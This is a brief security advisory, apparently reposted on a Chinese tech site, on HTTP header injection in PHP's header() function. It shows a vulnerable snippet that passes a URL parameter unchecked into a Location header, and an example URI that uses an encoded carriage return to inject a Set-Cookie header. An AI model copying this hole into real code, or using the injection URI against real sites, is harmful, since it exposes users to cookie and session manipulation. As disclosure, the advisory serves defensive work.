PHP 'header()' HTTP Header Injection Vulnerability

2012-09-22 23:50:00

An attacker can exploit this issue by enticing an unsuspecting user to follow a malicious URI.

The following vulnerable code and example URI are available:

&lt;?php

header('Location: '.$_GET['url']);

print_r($_COOKIE);

?&gt;

http://www.example.com/head1.php?url=http://example.com/head1.php%0DSet-Cookie:+NAME=foo

php http connection錯誤 http網站資訊 http資訊 http抓包工具 ecs站點http

上一篇: 閑談書畫行業在網際網路中的發展

下一篇: SNMP Reflected Denial Of Service - PoC

繼續閱讀

第三章 Joomla!擴充開發--後端開發（續2）
php 後端 javascript
08-07
Centos 7 Apache配置虛拟主機
php Linux apache centos 伺服器虛拟主機
08-07
PHP進階學習之session寫入資料庫
php session application 資料庫網絡
08-07
php寫一個簡潔的登入頁面
php
08-07
Apache與PHP環境下配置本地虛拟主機
php apache 虛拟主機
08-07
Testlink安裝部署之XAMPP
Testlink php 資料庫
08-07
TestLink 圖表中文亂碼問題
Testlink php
08-07
ecshop屬性排序
php
08-07
Ubuntu16.04安裝Apache+MySQL+PHP1. 安裝Apache2. 安裝MySQL3. 安裝PHP4. 安裝phpMyAdmin
php apache ubuntu mysql httpd
08-07
版本号隐藏
httpd nginx php tomcat
08-07
Apache配置SSLApache配置SSL
伺服器 php apache openssl ssl
08-07
配置apache支援PHP（win7）
apache httpd-conf php
08-07
Cloud Studio初體驗
Python ruby php
08-07
NOSQL安全攻擊
php 資料庫大資料
08-07
php 去掉字元串的最後一個字元及截取原字元串1,2,3,4,5,6,
php
08-07
php——水印
php 備忘水印
08-07